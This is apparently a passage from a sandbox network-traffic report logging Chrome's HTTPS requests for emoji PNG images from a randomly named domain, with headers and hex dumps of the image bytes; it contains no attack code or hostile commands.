                                  2025-01-12 00:04:00 UTC15974INData Raw: 2a 10 06 78 25 cb 00 4d c7 71 94 ad 36 db dd 52 28 8b 11 5b 27 eb c2 0b 07 00 9a 47 b0 83 75 c4 7d 90 ec 82 f2 03 db 95 b2 4a 02 6a e0 19 90 d4 c7 25 21 26 9c d7 2f 5b cd 80 23 a7 65 aa 17 fa 27 6e 3a 46 b6 1c 00 c6 fa 03 09 0e 36 35 9b f6 6f 01 62 f9 57 ff 0b 38 c7 be 90 56 d6 f9 eb 61 12 39 68 d3 52 3a 00 2b 8e 39 df fa f7 fc 52 26 f3 bd 9c b3 b7 95 e9 dd 4b 79 2e d5 c8 ad 29 56 51 a4 0d 89 df 25 e4 79 09 be bd 27 1d e5 49 d8 3b b5 2f e9 00 4b 4c 79 58 41 b9 0e 81 c7 43 c9 b0 85 b8 4f d6 9a 6b 93 89 0e f3 6f a0 ca ab 53 00 65 a1 90 2a 00 f6 0e 58 54 74 d9 19 fa 44 d8 98 35 d0 c9 f1 3e 6e 7c 08 52 21 5d fa 9d ec 1d 35 8c 6a 90 cb 4d a9 28 2b fd 2c b7 d7 d1 34 78 e2 34 5a e4 52 e7 0e de 19 dc c3 1a 3a 5f e9 40 17 3a 9c 48 bf 18 e0 32 f4 de 0d e4 cc be 71
                                  Data Ascii: *x%Mq6R(['Gu}Jj%!&/[#e'n:F65obW8Va9hR:+9R&Ky.)VQ%y'I;/KLyXACOkoSe*XTtD5>n|R!]5jM(+,4x4ZR:_@:H2q
                                  2025-01-12 00:04:00 UTC16384INData Raw: 82 25 5b fe 17 e0 e6 cc 59 bf 8c 26 08 b5 a2 c5 0b a2 fa 2b c0 d0 c1 30 83 f0 b6 a1 23 18 1d 8e 71 48 a6 0e 00 47 07 f9 c7 5b 65 8d 83 19 8b 21 a8 9b cf 33 73 59 60 3c 49 f1 5f bb 8e 03 16 7e 0f 16 2d fb 17 50 a8 0f c4 db 8b ff 54 b7 a6 70 47 1f 60 58 e1 cf c9 d8 72 89 df 4f 9e 24 bf 84 b8 94 2b 67 4e 0f 8d 88 db 25 97 72 26 cd 7a 6a 17 a8 d1 5f 6b 9c ab ca b7 a5 92 93 bc 42 7e 7e 73 06 d2 2e 1e e0 70 51 e7 e7 a0 e2 6e 36 36 1c 6e 0d 5f 85 ef da 30 02 af cd 9d 12 78 ed cd 85 14 43 39 a9 60 92 3f 48 7f 3b 9b 9e 1f a9 b8 d7 58 15 2b 6c 4d 4d 78 db bf f2 c3 9d 74 2f 3d 9d bc 89 94 1f fa a7 6f 06 01 57 85 85 92 45 ee 6d 1f 41 02 dd a9 da 4f d6 f3 df fb a6 dc f0 fd b5 9d 1e 13 57 2f ec f8 de 3d 7d aa da 42 65 24 c5 04 fd 32 fb 4d e1 49 87 3c 91 fd b9 99 73 df
                                  Data Ascii: %[Y&+0#qHG[e!3sY`<I_~-PTpG`XrO$+gN%r&zj_kB~~s.pQn66n_0xC9`?H;X+lMMxt/=oWEmAOW/=}Be$2MI<s
                                  2025-01-12 00:04:00 UTC16384INData Raw: b4 07 77 70 b9 c5 0a f6 00 45 aa da 5b eb 83 e2 46 66 6e 62 61 86 a2 17 ed e0 71 66 90 09 f8 85 5d 1e 97 b8 52 04 57 7a 52 3f ab ef c9 12 1d 0d 4b f3 2a 98 a7 f4 70 e5 cf d3 b7 f4 ee f1 b4 a5 99 8c 06 55 f7 0c b6 9a 49 39 96 50 1d 82 55 42 21 88 d3 51 83 be 96 93 d6 d5 8b 65 6b 5d 63 00 32 39 f1 b8 9b 73 cc d9 bc 9e eb 59 1a 1b 3c 4d 2d 9a 4b cc 89 3a 2c b1 21 fb 7b 7d b3 75 8b 3b 6f 1c ec 41 a4 f8 34 d7 39 10 e0 47 5d 6f 98 28 21 c9 2f 62 8a 6e c5 8e 9d 44 f1 a3 a1 6f 8c 2b b6 69 39 2b 25 b3 85 cc 3e a8 67 c6 74 6c 31 9d 2f 71 77 3a cb 1d d4 57 1c ad 65 78 ba 7a 5d ad 39 f8 e6 f5 1e 45 6a 9c d0 45 cf b7 81 b4 16 fd a2 61 fa b4 0d b0 32 f2 a2 91 70 aa 26 80 e9 66 e7 5b 0c 6d 97 0f 23 91 d8 b1 0b a5 d9 a8 cd e3 64 4e 3f 39 fc 91 53 96 ce c7 eb 38 31 7b 29
                                  Data Ascii: wpE[Ffnbaqf]RWzR?K*pUI9PUB!Qek]c29sY<M-K:,!{}u;oA49G]o(!/bnDo+i9+%>gtl1/qw:Wexz]9EjEa2p&f[m#dN?9S81{)
                                  2025-01-12 00:04:00 UTC706INData Raw: d0 3f b2 00 99 7f 8a 85 3b da 1d 72 d5 d3 37 2a c6 21 cd 1e 08 68 e7 d7 77 fe ac 56 b1 de de dd 8c a4 1e 2c 3e b6 c6 35 f2 c5 39 fb 59 a0 ad 36 c8 55 03 fa cc 07 24 27 05 90 a7 f1 0d 0f 88 15 00 f5 dc 2f d2 4e c9 7c 04 c6 50 7f 2c a5 c2 3d 21 c0 12 0a 3f 7a 7d 1d 2b bf 04 3f 38 ae b3 89 ae e9 87 af f7 2a 1f 35 d7 06 88 3d af f2 75 88 c5 65 c9 51 51 72 f1 5e 78 67 39 90 5b 7a 61 7e 46 30 a0 52 4c f6 69 c4 37 16 49 70 3e f1 7e b6 e9 27 4b a6 e8 02 75 13 0e d8 39 43 a5 d8 ba 85 77 27 84 31 7b 5a d2 11 de 84 42 c1 98 d7 46 5a 06 75 71 d0 3d b1 c0 7f dc 82 ec e0 14 c3 19 35 39 5a 68 5b 6f 10 ea 1d bb ee e9 ce e0 9b e5 55 00 5b 6e ee 41 0e 40 ab 57 ab ad 1a e8 d8 3d 09 5d 22 6d e7 a3 8d 2f 5f 04 ee c2 b5 19 12 70 0c 7f 65 05 70 fc 6f 34 fb b6 cb 7a d4 76 3d c5
                                  Data Ascii: ?;r7*!hwV,>59Y6U$'/N|P,=!?z}+?8*5=ueQQr^xg9[za~F0RLi7Ip>~'Ku9Cw'1{ZBFZuq=59Zh[oU[nA@W=]"m/_pepo4zv=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  91192.168.2.650006172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC608OUTGET /img-apple-160/1f1e6-1f1ee.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC898INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 5772
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-168c"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jLgF9rS1Tng4hH43UgfwUPBVSqBCe3TDv3rLcwUrNRoNGduplj4Y1Egjh%2Bu7inp3C8RAlSeKA39e6WXgFMBaJGymD0QIqicHM81%2FIqusSb7pE%2BKQGTaKGUXowXNDKz1OHYzI6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3008a5c4270-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1657&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1593886&cwnd=225&unsent_bytes=0&cid=b6cf46bc4264e242&ts=651&x=0"
                                  2025-01-12 00:04:01 UTC471INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 4e 49 6f 13 0c 35 6b 65 88 15 0f 39 71 6b 8e 12 0c 36 16 10 3a 6a 5f 82 1e 16 4c 78 6e 8f 10 0b 34 86 8d a5 0f 09 34 6d 63 86 12 0c 37 4f 4a 70 a0 ac a9 93 4b 4a 09 01 36 94 03 03 8f 89 8e 6b 66 8b 11 0b 35 a2 9d b0 7b 3c 50 9c 7a 8a a3 69 79 67 62 87 13 0d 37 6d 68 8d 10 0b 34 a7 a4 b1 13 0c 37 b6 65 6d 6c 67 8b 14 0e 38 0c 06 31 a4 4a 4b cc 6e 6f 8d 87 9f 9c 1e 25 70 6a 93 65 60 87 bf ca dd f5 ff ff fa fa fa ec ff ff ff ff cb f6 f6 f5 e0 ff fe ef f7 fe f2 f2 f1 fb ec e8 e1 f4 fb e5 e9 ef e8 e9 e7 de ea fb f9 e0 e0 ea e7 d9 e4 e4 e4 e7 ea bc dc e3 f1 ec ed 8a e1 e0 df f7 d5 d5 eb dd c9 d7 dd e8 e9 d5 b8 fc c7 c5 de df 92 d3
                                  Data Ascii: PNGIHDRPLTEGpLNIo5ke9qk6:j_Lxn44mc7OJpKJ6kf5{<Pziygb7mh47emlg81JKno%pje`
                                  2025-01-12 00:04:01 UTC1369INData Raw: 16 16 ea 14 14 fe 0a 09 e7 0e 0e f5 08 08 c6 19 1e e0 0b 0c 52 49 3f eb 00 00 db 04 04 e3 00 00 d4 02 02 45 3c 43 c0 01 02 70 17 4a 3a 30 50 32 26 77 a9 00 00 31 26 76 31 25 75 30 25 74 36 2d 33 2f 23 74 26 26 7b 2e 22 73 97 00 00 2c 20 71 2c 20 6f 91 00 00 2a 1e 6f 28 1c 6d 26 1b 6b 22 1a 55 63 00 12 15 15 72 1e 15 54 1e 16 4d 1d 11 63 1c 14 4d 1c 15 45 1a 0e 5e 1a 13 3f 18 0f 4a 16 09 64 15 0a 59 16 0f 3c 13 06 71 13 08 57 11 06 55 11 08 49 12 0a 3c 10 04 53 0e 03 52 0e 03 51 0e 07 34 0d 01 50 0a 00 5b 0c 01 4a 0c 00 4e 07 01 45 09 01 3f 02 00 56 03 00 4f 08 00 39 08 00 35 07 02 2d 59 52 86 41 3a 6d cc 5a 59 1a 0e 5b 48 3f 7f 3f 35 76 3b 33 6b 60 5b 82 20 16 5c db e4 e6 2e 23 6e 43 3a 7a 35 2a 72 51 49 7f 2b 21 68 57 51 7c 26 1d 5d 23 19 60 db a8 a6 cb
                                  Data Ascii: RI?E<CpJ:0P2&w1&v1%u0%t6-3/#t&&{."s, q, o*o(m&k"UcrTMcME^?JdY<qWUI<SRQ4P[JNE?VO95-YRA:mZY[H??5v;3k`[ \.#nC:z5*rQI+!hWQ|&]#`
                                  2025-01-12 00:04:01 UTC1369INData Raw: 99 bc 2e 17 30 a5 06 83 41 3f cb 44 44 22 82 50 f8 1e 3c 9d c9 c6 1f 60 96 74 6a 95 1a a2 55 77 aa 34 b2 45 3f c4 eb 9c 16 91 4a ec 58 2b 75 8e aa e5 a0 7a 67 ac fd 1b 7c bd 28 9b 81 e1 37 05 4e 8c de f9 43 c1 63 56 0c 90 15 c6 93 4c 26 16 44 e5 e1 cc 53 bf 1f be 67 d3 78 f5 45 9d 56 a7 45 e9 52 6b 64 4e af d7 3b 67 2b 17 40 bd 35 54 17 d5 51 cd d6 3b 67 05 10 a4 df 64 36 f7 f5 f4 6e 02 9a de 16 48 4f d0 65 3c fe 2c 00 bb 5d 1e 26 19 89 08 79 52 df b8 05 ce d3 43 cb 0c bf fa fb ce 5c ce 6b 01 78 6d c0 69 56 40 bd 82 d3 e0 3b 5b 05 f5 0a 42 d6 b5 1e 64 b3 5a a3 97 a7 ca 63 fd ff 3f f0 36 3d 1a 5a e0 1e d7 01 51 2d e2 27 22 09 82 23 ac 77 8f 67 a2 51 bb 1f 80 e7 73 c0 6f 11 70 2e 5b 6f d5 59 aa 83 82 ed 42 92 22 9f 33 0a 36 b3 3f d0 50 27 c1 49 6e 6c 2d 0f
                                  Data Ascii: .0A?DD"P<`tjUw4E?JX+uzg|(7NCcVL&DSgxEVERkdN;g+@5TQ;gd6nHOe<,]&yRC\kxmiV@;[BdZc?6=ZQ-'"#wgQsop.[oYB"36?P'Inl-
                                  2025-01-12 00:04:01 UTC1369INData Raw: 1f 6f 2b 68 68 5d 58 7e 01 77 d9 85 d9 69 de 96 69 f0 62 1a 88 4b 34 70 c0 1c 41 14 71 c6 10 45 71 7a 15 aa 30 a2 78 27 27 f0 27 df 36 94 84 ca 9e 75 8c 65 1a 14 1c b1 00 38 38 0a e9 77 ad 9f 69 3b 44 87 35 2c 2c 7b 1e c3 ba ea 4b 9f ec cb c0 f3 69 20 ae 31 43 85 26 0d 65 74 70 6c 84 89 31 f1 fc 80 b0 0f 5e fb 6b eb 61 99 a8 28 9c 5a e9 1a 3b 9b 99 83 00 4c 67 28 0d 04 e1 f1 63 b5 95 a5 85 7b 45 60 83 35 a6 12 3e 3c 0f 37 7f 33 e7 5f e2 8b cb 0e 2c d7 49 c5 52 4c 53 a1 a8 30 5b 4c 26 96 a2 ea 1c f6 ba 3a bd 2a 86 80 ca 96 c0 7c 2e 20 7c d5 7d f9 c5 df 5a 0d 8b 12 91 48 51 b6 0a cc ae 5e f7 f0 d8 c6 98 46 c7 9c 06 66 96 05 69 6d 9b 13 6d 7f 6d b5 e8 8c 0b 9a ef cd f9 7d 9e ac c0 17 4f ca 75 78 11 26 32 55 48 2a ec 66 35 41 aa c9 10 e7 b0 39 1c 46 74 c6 8c
                                  Data Ascii: o+hh]X~wiibK4pAqEqz0x'''6ue88wi;D5,,{Ki 1C&etpl1^ka(Z;Lg(c{E`5><73_,IRLS0[L&:*|. |}ZHQ^Ffimmm}Oux&2UH*f5A9Ft
                                  2025-01-12 00:04:01 UTC1194INData Raw: 72 2a 45 48 0f 1e bc 78 df bb 82 94 ec 96 55 4a 6b 2a 85 22 3d ed 41 90 78 e9 9e 16 d4 2a 22 96 ee c1 6d a5 46 91 2d 26 a5 69 1a f3 6b e2 24 9d 9a 9f 4d 3d e4 b2 c8 22 29 62 02 25 64 2f 25 b0 ec c6 fd 3c cf 33 ce 64 da 3c c9 64 1c 65 de 7f c1 ab cf f4 99 84 3c df 87 0b 54 d3 02 03 b1 1b df 8f 8f 4f 78 48 d3 d3 d7 95 3c 33 cf 8a 6f 74 00 0b a5 c3 8f d7 7e ba f5 77 39 9f cf e1 94 ca 7c e0 4b 61 65 6a 7c 72 82 d4 6e 9c bd 3c bf bb ab 07 b8 57 2a ed e5 c9 b7 41 fc 52 c7 05 c2 77 fb 2e 3e 26 2e fd 58 ec 1b e8 f7 0b 0b 17 a9 90 01 11 f1 5d 9d c3 7f a0 3e 60 21 8f c5 93 b6 d3 9d 81 e7 7e 78 78 97 74 ef fe e2 e2 9d 9f 7f 0d 19 00 6e 08 5e 08 55 e0 f5 69 f8 a6 f0 80 75 03 f1 85 95 07 f4 5d f8 e7 f7 c5 b3 cb cb cb 87 b5 c0 c6 46 26 f6 c2 00 d0 2f c4 6e 52 21 f1 21
                                  Data Ascii: r*EHxUJk*"=Ax*"mF-&ik$M=")b%d/%<3d<de<TOxH<3ot~w9|Kaej|rn<W*ARw.>&.X]>`!~xxtn^Uiu]F&/nR!!


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  92192.168.2.650001172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC617OUTGET /img-apple-160/1f3f4-200d-2620-fe0f.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 4635
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-121b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WqO0IGWNSV2lktOPcemHL6Y624%2FqXW48mlSAGgCEHc7DD5zIrvlEIjOwYpEJeSMJpdX7jX17nO40u0%2BJQvMmDxaapKmZZCe4U2EGOfPivHIP7jfrJjuc969WXxP4HzPZ1FMX0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e300cb4a6a58-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1730&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1195&delivery_rate=1645070&cwnd=235&unsent_bytes=0&cid=c5d7dca0cd4730a4&ts=671&x=0"
                                  2025-01-12 00:04:01 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 02 fd 50 4c 54 45 47 70 4c 16 16 16 ae ae ae 34 35 35 a9 a9 a9 17 16 15 4b 3f 34 a8 a8 a8 df de de 14 14 14 b0 b0 b0 10 10 10 a7 a7 a7 10 10 10 11 11 11 aa aa aa 75 75 75 11 11 11 ab ab ab 11 11 11 ad ad ad 59 56 54 14 14 14 ad ae ae 98 99 9a 12 12 12 7b 78 76 ab ab ab 12 12 12 0f 0f 0f a3 a3 a3 66 60 59 ae ae ae 11 11 11 ac ac ac 8e 8d 8d 0c 0c 0c ab ab ab 57 51 49 16 16 16 83 83 82 58 58 58 12 11 11 aa aa aa 8f 8f 8f 10 10 10 ae ae ae a9 a9 a9 a6 c0 d4 24 24 24 16 16 16 ab ab ab ad ad ad 69 79 85 14 14 14 f7 fe ff 39 39 39 ab ab ab 12 12 12 a3 a3 a3 ab ab ab 11 11 11 90 90 8f 51 51 51 0d 0d 0d ad ad ad 18 18 18 8c 8b 8b aa aa aa 10 10 10 4e 5e 6f 89
                                  Data Ascii: PNGIHDRPLTEGpL455K?4uuuYVT{xvf`YWQIXXX$$$iy999QQQN^o
                                  2025-01-12 00:04:01 UTC1369INData Raw: b3 b3 b3 9a b7 d1 af af af ab ac ac a6 a6 a6 a3 a3 a3 a0 a0 a0 9e 9e 9e 8b a1 b2 9b 9b 9b 98 98 98 97 97 97 96 96 96 82 9a af 94 94 94 92 92 92 8f 8f 8f 8e 8e 8e 8b 8c 8c 8a 8a 8a 88 88 88 71 8b a8 86 86 86 83 83 84 81 81 81 80 80 80 7d 7d 7d 7b 7b 7b 78 78 78 69 79 85 75 75 75 72 72 73 70 70 70 6e 6e 6e 61 6e 7a 6b 6b 6b 53 70 8f 68 68 68 66 66 66 63 63 63 60 60 60 5d 5d 5d 4a 5e 70 5a 5a 5a 61 53 55 60 54 48 56 56 56 41 58 70 53 53 53 50 50 50 3b 53 6b 4d 4d 4d 4b 4b 4b 49 49 49 3f 4b 54 47 47 47 53 3f 40 45 45 45 2f 49 63 31 46 5a 42 42 42 40 40 40 3f 3f 3f 3e 3e 3e 3d 3d 3d 3c 3c 3c 3b 3b 3b 3a 3a 3a 39 39 39 38 38 38 37 37 37 36 36 36 35 35 35 34 34 34 33 33 33 32 32 32 31 31 31 30 30 30 2f 2f 2f 2e 2e 2e 2d 2d 2d 2c 2c 2c 2b 2b 2b 2a 2a 2a 29 29 29
                                  Data Ascii: q}}}{{{xxxiyuuurrspppnnnanzkkkSphhhfffccc```]]]J^pZZZaSU`THVVVAXpSSSPPP;SkMMMKKKIII?KTGGGS?@EEE/Ic1FZBBB@@@???>>>===<<<;;;:::999888777666555444333222111000///...---,,,+++***)))
                                  2025-01-12 00:04:01 UTC1369INData Raw: 0d 55 63 29 65 c5 d3 71 1c 37 43 c9 70 00 28 00 21 9c be 40 20 f6 dd b8 b6 5b 00 a7 46 3f 19 05 ec c1 c1 22 61 f9 54 0b 32 d8 cd 09 6e 70 fe bd da c0 b3 9a 7d ac a5 16 12 cd 9d 1e d5 54 2b 5b e8 80 ed fc c9 82 61 b5 dc cd b5 54 98 7d 0f df 71 f6 28 d8 a9 eb 16 a2 9f bd 2d 48 2a e6 8d 84 d2 1d 2f 61 f9 08 d4 aa 0e 23 88 30 38 46 70 2c a5 64 17 78 ca 84 10 76 41 35 d1 89 6f a1 30 44 e4 fa f1 0f 8e de 8c 33 3c 38 1c 97 27 58 0d 07 cc 46 16 ec 84 3a e1 41 6d 22 f7 1f c2 45 88 c9 f1 1b 9f 4d 47 e7 fc e2 60 a4 a5 0b 2e b7 cb 08 a1 5a 7d c6 4d e1 66 2f 45 2c 19 bb 73 5d 07 50 e5 08 6e a0 60 08 6b e9 78 2c a5 2e e2 a7 58 45 88 70 0e 93 d3 35 ae 05 09 80 1b 2f c8 31 79 e6 dd a3 67 45 74 61 43 32 cb 70 f1 27 03 28 35 03 e7 59 43 e6 06 09 72 2c f7 de 89 0b 17 3e fc
                                  Data Ascii: Uc)eq7Cp(!@ [F?"aT2np}T+[aT}q(-H*/a#08Fp,dxvA5o0D3<8'XF:Am"EMG`.Z}Mf/E,s]Pn`kx,.XEp5/1ygEtaC2p'(5YCr,>
                                  2025-01-12 00:04:01 UTC1369INData Raw: 96 85 68 ba 3f 5e 5c fd 12 53 f4 9b cc a1 91 9d 9b ab 57 cd 5d 43 eb 00 22 02 e1 d2 b1 93 27 4f 9c f8 f0 e8 f5 24 ad b6 20 a7 be 3d 73 fa a6 91 1a d8 bb 03 4c f0 f0 b5 90 de 74 68 c0 b7 26 94 4b b6 2c 8d 5f 39 79 2e b9 3a 1f bf 85 b0 5e f8 7c 1c 39 80 9e 38 30 75 3f a8 33 83 01 6d d3 fa 07 bd 87 4e dd f6 ac 09 0a 81 48 8c 7f d1 36 58 5a d5 04 d5 d8 e9 5b 42 d3 54 64 06 fa 3a e6 fc b9 62 fd c6 a7 9f 12 76 b6 fb f9 0d 60 cc 12 1f bb aa 10 ea 40 2b 21 98 fe ea 32 54 90 2d 76 6c 31 bc ab 90 53 3d dd c3 7b f6 6c 19 16 f7 8b 2a e5 32 87 07 3d 43 72 11 24 30 5d 56 ea fa 35 5c 90 a9 f3 e6 d9 6c 8c 88 b1 75 6f 21 3f 74 70 cb d6 fd 5b 1e 7f e2 e9 78 db e0 85 5b 0f 85 ce a0 6c c7 c1 f5 ae 5d 28 b1 f8 45 03 6a 90 20 2b a9 f4 ed 4f ee 47 01 58 7d fb 14 8b 69 ed b6 c1
                                  Data Ascii: h?^\SW]C"'O$ =sLth&K,_9y.:^|980u?3mNH6XZ[BTd:bv`@+!2T-vl1S={l*2=Cr$0]V5\luo!?tp[x[l](Ej +OGX}i
                                  2025-01-12 00:04:01 UTC55INData Raw: 09 b6 04 5b 82 2d c1 66 a1 ce 0e 1a 7e b8 d0 c6 fd 7b 9e da a2 b5 fe c7 5c 8b 16 2d 5a b4 68 b1 ea fc 11 68 ca d8 76 63 6b 55 08 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: [-f~{\-ZhhvckUIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  93192.168.2.650005172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC370OUTGET /img-apple-160/1f1e9-1f1ff.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:00 UTC891INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: image/png
                                  Content-Length: 4810
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-12ca"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YTIKSClBKRVH5r4N9YY9pECaz1Csw4wnD36WqlBnMloGfQwHJL4CVzCu6np6qbUCVM4Il1HdVvBVzZo9omVFbXv25mJloslAXVEAncZblTTnAi5MLdThQg7stHDT7sdTQLQ2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3019ffc0f9f-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1469&rtt_var=558&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1950567&cwnd=216&unsent_bytes=0&cid=4eae6bdc93945d68&ts=315&x=0"
                                  2025-01-12 00:04:00 UTC478INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 82 8b 85 90 a8 9a 0c 46 24 6c 89 78 c4 c4 c4 51 6a 5a 75 84 7b 0c 47 25 73 8d 7e c8 c8 c8 6b 9f 81 0b 46 23 7d 7c 7d c4 c4 c4 66 9b 7c a9 a9 a9 67 74 6d 0a 45 22 8e 8e 8e c6 c6 c6 57 8c 6d 7f 87 82 04 4f 22 01 4a 20 76 76 76 c2 c5 c3 65 9a 7b 08 45 21 68 73 6c 67 9b 7d c8 c8 c8 83 83 83 0d 47 25 62 96 78 d1 d0 d0 69 9d 7f 09 44 21 71 71 71 84 84 84 c1 c1 c1 63 97 79 0c 47 24 ce ce ce 69 9d 7e 84 84 84 75 75 75 cf cf cf c0 c0 c0 05 40 1e 59 8d 6e cc c6 c9 35 75 50 ff ff ff fe ff ff ff fe ff fd fe fe fd fc fc fc fb fb fb fa fa fa f9 f9 f8 f8 f8 fe f4 f5 f7 f7 f7 f6 f6 f6 f5 f5 f5 f4 f4 f4 f4 f3 f3 f2 f2 f2 fd ec ec f1 f1 f1 ef
                                  Data Ascii: PNGIHDRPLTEGpLF$lxQjZu{G%s~kF#}|}f|gtmE"WmO"J vvve{E!hslg}G%bxiD!qqqcyG$i~uuu@Yn5uP
                                  2025-01-12 00:04:00 UTC1369INData Raw: 7b 4f 92 6b 56 8d 6d 3d 98 63 74 74 74 f0 3e 3e 41 8f 62 4d 88 66 32 96 5b 07 a7 5b 25 98 56 32 90 59 1a 9c 56 24 97 55 25 95 54 25 94 53 3b 87 5a 09 a1 57 23 93 52 22 92 51 f0 2f 2f 42 80 4e 2b 8a 52 20 90 4e 59 74 48 23 8e 4f 0a 9a 51 75 66 3e 1e 8f 4d 82 5f 3c 13 94 4e 97 54 38 1d 8e 4c 2e 83 4f 1b 8d 4b 1f 8a 4b f1 26 26 1b 8c 4a ee 26 26 19 8b 49 c5 39 2c b4 41 2f 66 66 3c 19 8a 48 ee 24 24 9e 4a 32 d7 2e 27 1d 86 49 f6 1f 22 17 89 47 ee 22 22 fe 1a 20 17 88 46 1f 83 49 ec 21 21 16 87 45 e3 24 21 14 86 44 ea 1f 1f 14 85 43 ff 14 1d 20 7d 47 13 84 42 ef 1b 1b 19 80 43 f6 17 1b 7c 51 2c 05 89 3d 11 82 40 11 81 40 10 80 3f ff 0e 17 0f 80 3e 06 85 3b d8 20 1a 0e 7f 3d ee 14 14 0d 7e 3d 16 79 3f 0d 7d 3b 1e 71 41 0b 7c 3a 0b 7b 39 09 7a 38 09 79 38 ee 0c
                                  Data Ascii: {OkVm=cttt>>AbMf2[[%V2YV$U%T%S;ZW#R"Q//BN+R NYtH#OQuf>M_<NT8L.OKK&&J&&I9,A/ff<H$$J2.'I"G"" FI!!E$!DC }GBC|Q,=@@?>; =~=y?};qA|:{9z8y8
